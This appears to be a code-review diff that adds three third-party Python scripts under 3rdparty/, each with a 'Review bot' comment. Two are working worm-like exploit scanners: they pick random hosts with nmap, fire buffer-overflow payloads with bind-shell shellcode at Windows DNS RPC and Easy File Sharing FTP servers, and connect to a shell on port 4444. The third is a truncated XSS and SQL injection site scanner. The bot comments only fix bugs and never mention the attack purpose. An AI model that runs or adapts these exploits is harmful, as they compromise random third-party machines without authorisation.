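Review bot: Two of the printed digests in 3rdparty/Crypter.py are mislabeled: the `"MD5 = "` line prints `h3.hexdigest()`, which is the MD4 object, and should read `print "MD5 = "+h4.hexdigest()`; the `"SHA256 = "` block builds `h7 = SHA.new()` (SHA-1, the same as h6) and should be `h7 = SHA256.new()`, otherwise the SHA256 import is unused and the output is wrong. The HMAC key `secret = b'B3mB4m'` is a fixed literal in source, so the resulting MAC has no secrecy; for anything beyond a demo it should be supplied from configuration rather than the file. The comment `# You can see codes here, but � want change somethins` carries a mis-encoded character (probably a stray `I`), and the docstring says `SHA526` where SHA256 is meant.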
@@ -0,0 +1,178 @@ +#!/usr/bin/python +#This is a Windows DNS RPC service scanner for the new exploit #http://www.milw0rm.com/exploits/3737, uses nmap to locate win2000 machines +#and if found continues to use the exploit. Threw in a little threading to speed +#the process up. Remove the 2000 and whitespace in between at line 137 to exploit +#all windows machines found. I noticed for this exploit you need impacket for it +#to work properly, http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz +#download that, untar, cd, su root, python setup.py install +#thats it... + +#!!! You need to be root for the nmap flags to work properly !!! + +# Remote exploit for the 0day Windows DNS RPC service vulnerability as +# described in http://www.securityfocus.com/bid/23470/info. Tested on +# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 +# and then connects to it. +# +# Cheers to metasploit for the first exploit. +# Written for educational and testing purposes. +# Author shall bear no responsibility for any damage caused by using this code +# Winny Thomas :-) + +import os, StringIO, re, random, commands, sys, time, thread +try: + from impacket.dcerpc import transport, dcerpc, epm + from impacket import uuid +except(ImportError): + print "\nYou need the Impacket Module" + print "http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz\n" + sys.exit(1) + +#Portbind shellcode from metasploit; Binds port to TCP port 4444 +shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" +shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" +shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" +shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" +shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" +shellcode += 
"\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" +shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" +shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" +shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" +shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" +shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" +shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" +shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" +shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" +shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" +shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" +shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" +shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" +shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" +shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" +shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" +shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" + +# Stub sections taken from metasploit +stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' +stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00' +stub += '\x00\x00\x00\x00\x12\x05\x00\x00' +stub += '\\A' * 465 +# At the time of overflow ESP points into our buffer which has each char +# prepended by a '\' and our shellcode code is about 24+ bytes away from +# where EDX points +stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll +# The following B's which in assembly translates to 'inc EDX' increments +# about 31 times EDX so that it points into our shellcode +stub += '\\B' * 43 +# Translates to 
'jmp EDX' +stub += '\\\xff\\\xe2' +stub += '\\A' * 134 +stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00' +stub += '\x03\x00\x00\x00\x47\x00\x00\x00' +stub += shellcode + +def timer(): + now = time.localtime(time.time()) + return time.asctime(now) + +# Code ripped from core security document on impacket +# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf +# Not a neat way to discover a dynamic port :-) +def DiscoverDNSport(target): + trans = transport.SMBTransport(target, 139, 'epmapper') + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) + pm = epm.DCERPCEpm(dce) + handle = '\x00'*20 + while 1: + dump = pm.portmap_dump(handle) + if not dump.get_entries_num(): + break + handle = dump.get_handle() + entry = dump.get_entry().get_entry() + if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): + port = entry.get_string_binding().split('[')[1][:-1] + return int(port) + + print '[-] Could not locate DNS port; Target might not be running DNS' + +def ExploitDNS(target, port): + trans = transport.TCPTransport(target, port) + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) + + dce.call(0x01, stub) + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + + +def Worker(): + + global num + global found + + nmap = StringIO.StringIO(commands.getstatusoutput('nmap -T 3 -O --host-timeout 35s --osscan-guess -iR 1')[1]).readlines() #Change your nmap flags if needed + + for tmp in nmap: + if re.search("QUITTING!",tmp): + print '[-] You must run this script as root for the nmap flags to work properly!!!' 
+ print 'Type: Ctrl-C\n' + sys.exit(1) + ip = re.findall("\d*\.\d*\.\d*\.\d*", tmp) + if ip: + target = ip[0] + print "Searching:",target + for tmp in nmap: + if re.search("Aggressive OS guesses:", tmp): + os = tmp.split(",",1)[0].replace("Aggressive OS guesses:","") + if os: + os = re.sub(r'\(\d+%\)',"",os,1) + print "\tFound:",os + num +=1 + if re.search("Windows 2000",os): #Take out the 2000 to exploit all windows found machines + found.append(target+" : "+os) + print "\tFound a Win2000 machine:",os + print '\n[+] Locating DNS RPC port' + port = DiscoverDNSport(target) + print '[+] Located DNS RPC service on TCP port: %d' % port + ExploitDNS(target, port) + print '[+] Exploit sent. Connecting to shell in 3 seconds' + time.sleep(3) + ConnectRemoteShell(target) + +if len(sys.argv) != 2: + print "\n\t d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0" + print "\t--------------------------------------------------" + print "\n\tUsage: ./DNSRPCscanner.py \n" + print "\tEx. ./DNSRPCscanner.py 10000\n" + sys.exit(1) + +else: + print "\n d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0" + print "--------------------------------------------------" + print "[+] Scanning: 0day Windows DNS RPC service vulnerability" + print "[+] Targets:",int(sys.argv[1]) + print "[+] Starting:",timer(),"\n" + print "[+] Scanning...\n" + found = [] + num = 0 + for x in range(10): + for i in range(int(sys.argv[1])/10): + time.sleep(random.randint(1, 3)) + work = thread.start_new_thread(Worker, ()) +print "\n[-] Scanning Complete:",timer() +print "[-] Found:",num,"o-systems" +print "[-] Found:",len(found),"using win2k\n" +if len(found) >=1: + print "[-] Target List:\n" + for os in found: + print os + + + + diff --git a/3rdparty/EFSscan.py b/3rdparty/EFSscan.py new file mode 100644 index 0000000..cb94578 --- /dev/null +++ b/3rdparty/EFSscan.py 
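Review bot: Worker's `os = tmp.split(",",1)[0].replace("Aggressive OS guesses:","")` and the module-level `for os in found:` loop rebind the name `os`, shadowing the `os` module imported at the top of the file; inside Worker that makes `os` a local for the whole function body, and the final loop replaces the global module binding. Renaming the variable, e.g. `osname = tmp.split(",",1)[0].replace("Aggressive OS guesses:","")` together with `for osname in found:`, removes the ambiguity. The `commands`, `thread` and `StringIO` modules used here are Python 2 only, so the file will not import on Python 3; if Python 2 is the intended runtime, the header comment should say so.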
@@ -0,0 +1,146 @@ +#!/usr/bin/python +#Modified Winny Thomas EFS exploit to scan(uses nmap) for random open ftp ports then +#check the banner for EFS server, if found, exploit it... +#http://www.milw0rm.com/exploits/3579 +#d3hydr8[at]gmail[dot]com + +# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability +# was discovered by h07 and a POC for windows XP SP2 (polish version) was +# provided. This exploit was tested on windows 2000 server SP4. The exploit +# binds a shell on TCP port 4444. +# +# Author shall bear no responsibility for any screw ups +# Winny Thomas :-) + +import os +import sys +import time +import struct +import socket +import StringIO, re, commands + +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" +shellcode += "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x48\x45\x34\x4e\x33\x4b\x38\x4e\x37" +shellcode += "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" +shellcode += "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38" +shellcode += "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +shellcode += "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58" +shellcode += "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34" +shellcode += "\x4b\x38\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48" +shellcode += "\x49\x38\x4e\x46\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d" +shellcode += "\x46\x36\x4b\x48\x43\x34\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x58" +shellcode 
+= "\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x35\x48\x36\x4a\x36\x43\x43\x44\x43\x4a\x36\x47\x37\x43\x57" +shellcode += "\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" +shellcode += "\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" +shellcode += "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44" +shellcode += "\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x31" +shellcode += "\x4e\x45\x48\x36\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d" +shellcode += "\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56" +shellcode += "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55" +shellcode += "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x46\x4a\x36\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x35\x49\x32\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x44\x4e\x32" +shellcode += "\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" +shellcode += "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46" +shellcode += 
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x46" +shellcode += "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f" +shellcode += "\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" +shellcode += "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x36\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a" + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + +def ExploitFTP(target): + sockAddr = (target, 21) + tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + tsock.connect(sockAddr) + response = tsock.recv(1024) + print response + + # At the time of overflow EBX points into our shellcode + payload = 'A' * 2553 + # NOP's pad with a 15 byte jump over some junk and the RET address + # Jumps into our shellcode + payload += '\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f' + # Address of 'call ebx' from kernel32.dll SP4 + payload += struct.pack('" + sys.exit(1) +else: + num=sys.argv[1] + + print "\n d3hydr8[at]gmail[dot]com EFSScan v1.0" + print "--------------------------------------------------" + print "+ Target: Easy File Sharing FTP server V2.0" + print "+ Target port: 21" + print "+ Scanning:",num,"\n" + + count = 0 + while count != int(num): + count += 1 + print "Trying:",count,"of",num + #Change your nmap arguments, if you want. + nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -p 21 -iR 1 | grep -B 4 open')[1]).readlines() + for tmp in nmap: + if re.search("21/tcp\s+(?=open)", tmp): + port = int(21) + for tmp in nmap: + ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp) + if ipaddr: + host = ipaddr[0] + print "\n- Found port open on",host,"checking banner." + + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(10) + s.connect((host, port)) + time.sleep(7) + s.send("\r\n") + response = s.recvfrom(1024)[0] + s.close() + #Change this to whatever EFS banner looks like. 
(use lowercase) + if re.search("easy file", response.lower()): + print "\n\t\tEFS server found in banner, attempting to exploit...\n" + ExploitFTP(host) + else: print "\tNo Match:",response,"\n" + except(socket.error,NameError), msg: + print "\tAn error occurred:", msg,"\n" + s.close() +# milw0rm.com [2006-08-26] + diff --git a/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py b/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py new file mode 100644 index 0000000..ecf42d7 --- /dev/null +++ b/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py 
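Review bot: The `s.close()` inside the `except(socket.error,NameError), msg:` handler can raise on its own: when `socket.socket(...)` fails before `s` is bound, the handler trips a second NameError that nothing catches. Catching `NameError` alongside `socket.error` also masks genuine programming errors anywhere in the `try` body, including inside `ExploitFTP(host)`, and reports them as `An error occurred`. Initialise `s = None` before the `try`, catch only `socket.error`, and close under a guard, `if s is not None: s.close()`. `s.recvfrom(1024)[0]` on a connected TCP socket is the same as `s.recv(1024)` and reads more naturally.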
@@ -0,0 +1,1041 @@ +#!/usr/bin/python + +# VulnDetector Version 0.0.1pa +# Author: Brad Cable +# License: GPL Version 2 + + +## basic config - these need to be changed depending on the site to be scanned ## + +site="http://www.site.com/" # URL to tree/scan +domains=[".site.com",".site2.com"] # whitelist of domains to scan, with a "." infront, it matches all subdomains as well +pagetype="php" # type of code used on the site being scanned ("php" or "asp") + +# log locations, all logs are stored at [the current directory]/logs/LOGFILE +vulnlogfile="gfqlog" # file to log all detected vulnerabilities as they are encountered +urllogfile="gfqurllog" # file to log all urls fetched as they are fetched +reportfile="gfqreport" # at the end of the scan, the detected vulnerabilities are compiled into a neat list, and logged to this file +usecookies=True # whether or not to send a cookie header value each time (True or False) +cookies="" # if usecookies is True, then + +## end basic config ## + + + + + +## advanced config - only change these if you know what you are doing, you really shouldn't need to touch these at all... ## + +xssscan=True # scan for XSS vulns (True or False) +sqliscan=True # scan for SQLI vulns (True or False) + +checklevel=1 # checklevel: + # 1 = Silent SQL, Silent XSS + # 2 = Silent SQL, Silent XSS when possible (semi-silent when not) + # 3 = BLAST THE SITE! 
(AKA, non Silent SQL, non Silent XSS, causes tons of MySQL Errors + # on the site and could possibly flood someone's admin email) + +levels=7 # levels deep to tree the site (I recommend 6-8; 6 is shorter, and fairly thorough, while 8 is just plain crazy long and a little too thorough) +ignore_subdomain=True # ignore subdomains for HTTP Host field and other places (should leave as True) + +scanlimit=5 # times to scan the same URL with different query strings, + # "bob.php?id=1" and "bob.php?id=2" count as two scans, + # and until scanlimit is hit, it will continue to check + # vulnerabilities on that URL + +indent=" " # indent used when displaying the results +ignorefileext="swf,fla,gif,jpeg,jpg,tiff,png,mng,pdf,dat,mpeg,mpg,mp2,mp3,wav,mod,mov,avi,asf,asx,ogg,asc,tgz,rpm,deb,gz,bz2,zip,rar,c,cpp,h,o,ko,py,so,torrent,js,css,msi,exe,bin,dmg,x86,ut4mod,wmv,rmvb,txt,n64,cbs,max,xps,xpi" # list of file extensions that shouldn't be downloaded and scanned + +randidentlen=6 # this is so internal, you shouldn't touch it whatsoever +decapitation=True # this is so internal, you shouldn't touch it whatsoever + +## end advanced config ## + + +######################################## +### DO NOT TOUCH THE REST!!! 
### +######################################## + +## setup ## + +# import modules +import socket,sre,time,random + +# debugging +from sys import exit # exit() for debug +# debug mode +from sys import argv +debug=False +if len(argv)>=2: debug=(argv[1]=="1") + +# declare output variables +urlfields={} +postfields={} +treedurls={} +reportvar={} + +# get comment type to use +if pagetype=="asp": comnt="%2d%2d" +elif pagetype=="php": comnt="/*" +else: + print "Unknown Page Type: "+pagetype.upper() + print "Using Default Database Comment: --" + comnt="%2d%2d" + +# get session stuff to use +sessstr="(?i)" +if pagetype=="asp": sessstr+="aspsessionid([a-z]{8})=([a-z]{8})" +elif pagetype=="php": sessstr+="phpsessid=([a-z0-9]{32})" +else: + print "Unknown Page Type: "+pagetype.upper() + sessstr+=pagetype+"sessid=([a-z0-9]{32})" + print "Using Default Session Syntax: --" + +# set up the ignore file extension variable to be useable +ignorefileext=","+ignorefileext+"," + +## end setup ## + + +## function declaration ## + +# function to determine if a list object is empty in any way +def listempty(listarg): return (listarg==None or listarg==[] or type(listarg)!=type([]) or len(listarg)==0) + +# function to edit files easily +def filestuff(fname,body="",fptype=False): + + if not fptype: + if body=="": fptype="r" + else: fptype="a" + + fp=open(fname,fptype) + fp.write(str(body)) + fp.close() + +# function to remove non unique items +def uniqlist(listarg): + if type(listarg)!=type([]): return + newlist=[] + for i in range(len(listarg)): + if newlist.count(listarg[i])==0: newlist[len(newlist):len(newlist)]=[listarg[i]] + return newlist + +# function to get the page name of a url +def pagename(url): + if url[:7]=="http://": url=url[7:] + slash=url.find("/") + if slash!=-1: url=url[slash:] + else: url="/" + return url + +# function to fix urls like "http://www.google.com" or "www.google.com" into "http://www.google.com/" +def urlfix(url): + if url[:7]!="http://": url="http://"+url + 
slash=url[7:].find("/") + if slash==-1: url+="/" + return url + +# function to get the server name of a url +def servername(url,ig_subd=ignore_subdomain): + url=urlfix(url)[7:] + url=url[:url.find("/")] +# if ig_subd: url=sre.sub("^.*?([^\.]*\.[^\.]*)$","\\1",url) + return url + +def checkserver(server): + global domains + for domain in domains: + if domain[:1]==".": + if server[-len(domain)+1:]==domain[1:]: return True + else: + if server==domain: return True + return False + +# function to fix the headers so they don't contain %25's (%'s) or the xxploit code +def headerfupr(hdr,explt): + hdr=hdr.replace("%25","%") + hdr=hdr.replace(explt,"") + return hdr + +# function to remove urls from the body of a page +def removeurls(body): return sre.sub("http://([^ \"\']+)","",body) + +# function to retreive the full path of a url based on the current page url +def fullpath(url,pageurl): + + if url.lower()[:7]=="http://": return url + + if pageurl.count("?")!=0: pageurl=pageurl[:pageurl.find("?")] + + if url.count("?")>0: + if url[:1]=="?": return pageurl+url + pageurl=pageurl[:pageurl.find("?")] + + #pageurl=pageurl[:pageurl.find("?")] + + pagedomain=pageurl[:pageurl[7:].find("/")+7] + if url[:1]=="/": return pagedomain+url + + pagepath=pageurl[pageurl[7:].find("/")+7:] + pagepath=pagepath[:pagepath.rfind("/")+1] + path=pagepath+url + path=sre.sub("\.\/","\/",path) + path=sre.sub("\/([^\/]+)\/..\/","\/",path) + + return pagedomain+path + +# function to get the value of HTML attribute before a ">" +def getattrval(body,attr): + body=sre.sub("([^\>]*)\>([^\000]*)","\\1",body) + if sre.search(attr+"=(\"|'|)([^\\1\ \>]*)\\1",body)!=None: + delim=sre.sub("[^\>]* "+attr+"=(\"|'|)([^\\1\ \>]*)\\1([^\>]*)","\\1",body) + exp="[^\>]* "+attr+"=(\\"+delim+")([^" + if delim=="": exp+="\ " + else: exp+=delim + exp+="\>]*)\\"+delim+"([^\>]*)" + return sre.sub(exp,"\\2",body) + else: return "" + +# function to retreive a page based on input +def 
getpage(url,dheaders=1,redir=0,realpage=0,poststring="",exceptions=0): + + # function to recurse and try getpage() again with new values + def recurse(exceptions): + + sock.close() + exceptions+=1 + + if exceptions<=6: return getpage(url,dheaders,redir,realpage,poststring,exceptions) + else: + print "Too many recursions, skipping..." + return + + + global usecookies,urllogfile,debug,ignorefileext + if not checkserver(servername(url)): return + + if url.find("#")!=-1: url=url[:url.find("#")] + + # file extensions that need to be ignored code + fileext=sre.sub(".*(http\://[^/]*/).*","\\1",url) + if url==fileext: fileext="None" + else: fileext=sre.sub("^.*\/[^/]*\.([^\&\#\?\/]*)[^/]*$","\\1",url) + if ignorefileext.count(","+fileext+",")!=0: return + + try: + + sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((servername(url,False),80)) + + workurl=pagename(url) + theurl=url + if redir!=1: theurl=workurl + + qrytype="GET" + if poststring!="": qrytype="POST" + out=(qrytype+" "+theurl+" HTTP/1.1\n" + "Host: "+servername(url,False)+"\n" + "Connection: close\n") + if usecookies: + global cookies + out+="Cookie: "+cookies+"\n" + if poststring!="": + out+="Content-Type: application/x-www-form-urlencoded\n" + out+="Content-Length: "+str(len(poststring)) + out+="\n\n"+poststring+"\n" + out+="\r\n\r\n" + sock.send(out) + + # get response type and log the page + response=sock.recv(12)[-3:] + fp=open("logs/"+urllogfile,"a") + fp.write(url+": "+response+" "+str(realpage)+"\n") + if poststring!="": fp.write(indent+"POST: "+poststring+"\n") + fp.close() + + + # at 404 response, close connection and fail + if response=="404" or response=="500": + sock.close() + return + + # at 30[1237] response types, recurse new page + if sre.search("30[1237]",response): + while 1: + chunk="" + byte=sock.recv(1) + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + if chunk.lower()[:9]=="location:": + location=chunk.lower()[9:].strip() + if 
location=="http://"+servername(url,False)+url: location="/" + locpage=fullpath(location,url) + sock.close() +# if url[len(url)-2:]=="" and locpage[len(locpage)-4:]=="": break + redir=1 + if locpage!=url: + redir=0 + if pagename(sre.sub("\\\\(\"|\')","\\1",locpage))==pagename(url): + print "QUOTE REDIR" + return + print "OLD:",url + print "NEW:",chunk.lower() + print "REDIR:",locpage + return getpage(locpage,redir=redir,realpage=realpage) + if realpage==1: + sock.close() + return + + elif realpage==1: + sock.close() + return url + + # get headers, ignoring certain HTTP headers + headers="" + type=0 + while 1: + chunk="" + byte=sock.recv(1) + if byte=="\r": + sock.recv(1) + break + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + + if chunk.lower()[:11]!="set-cookie:" and chunk.lower()[:5]!="date:" and chunk.lower()[:15]!="content-length:" and chunk.lower()[:11]!="keep-alive:" and chunk.lower()[:18]!="transfer-encoding:" and chunk.lower()[:11]!="connection:": + headers+=chunk + +# if chunk.lower()[:15]=="content-length:": +# type=1 +# conlen=int(chunk[16:]) + + if chunk.lower()[:26]=="transfer-encoding: chunked": type=2 + + # no special type specified, just get the page + if type==0: + body="" + while 1: + chunk=sock.recv(200) + body+=chunk + if chunk=="": break + + + # set it up if it does have a type +# else: +# byte=sock.recv(1) +# if byte=="\r": sock.recv(1) +# else: +# while 1: +# i=-1 +# while byte!="\r": +# i+=1 +# byte=sock.recv(1) +# nbytes=sock.recv(3) +# if nbytes=="\n\r\n": break + +# # content-length +# if type==1: +# body="" +# for i in range(conlen): +# chunk=sock.recv(1) +# body+=chunk + + # transfer-encoding: chunked + if type==2: + body="" + chunksize="" + while chunksize!=0: + byte="" + chunk="" + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + chunksize=int(chunk,16) + wchunksz=chunksize + while wchunksz>=1: + subchunk=sock.recv(wchunksz) + body+=subchunk + wchunksz-=len(subchunk) + sock.recv(2) + + # clean 
up and return + sock.close() + if dheaders!=1: headers="" + + return [headers,body,urlfix(url)] + + # catch socket errors, such as "connection reset by peer" - trys again until it gives up and goes on to the next page + except socket.error: + print "Socket Error, Recursing..." + return recurse(exceptions) + +# function to remove everything in the "" tag from a server response +def decapitate(body): + + if body==None: return + + global decapitation + if decapitation==True: body=sre.sub("(.+?)","",body) + + return body + + +# function to generate a random identification string +def randident(thelen=randidentlen,randchars="Bghi3rj9uwEFabTGH1ImnL4xpCstUOvoPYk25qVJK8Z0Q67lWXefMRSDcdyzAN"): +# global randidentlen + rndidnt="" + while len(rndidnt)=4: + body=removeexplt(body,explt) + body=parsebody(body) + body=removeexplt(body,explt) + else: body=parsebody(body) + if randstr!="": body=removeexplt(body,randstr) + + return body + +# function to parse the body for checking agsinst others +def parsebody(body): + + global sessstr,pagetype + + body=body.replace("%2d","-") + body=body.replace("%2D","-") + body=body.replace("%25","%") + body=body.replace("%20"," ") + body=body.replace("+"," ") + body=body.replace("%2b","+") + body=body.replace("%2B","+") + body=body.replace("%22","\"") + body=body.replace("\\\"","\"") + body=body.replace("\\'","'") + body=body.replace("\n","") + body=body.replace("\r","") + body=sre.sub(sessstr,"",body) + + # These might cause problems + body=sre.sub("\]*)\>(.*?)\","",body) + body=sre.sub("\ "+url + + pageinfo=getpage(url) + if listempty(pageinfo): return + + body=pageinfo[1].lower() + + print "AA" + + # select/option, textarea + # check for forms + bodyarr=sre.split("")] + frmbody=bodyarr[i][bodyarr[i].find(">"):][:bodyarr[i].find("")] + + actionurl=getattrval(frmsect,"action") + if actionurl=="" or actionurl==frmsect or actionurl=="\"\"": actionurl=pageinfo[2] + if actionurl.count(";")>0: actionurl=actionurl[actionurl.find(";")+1:] + if 
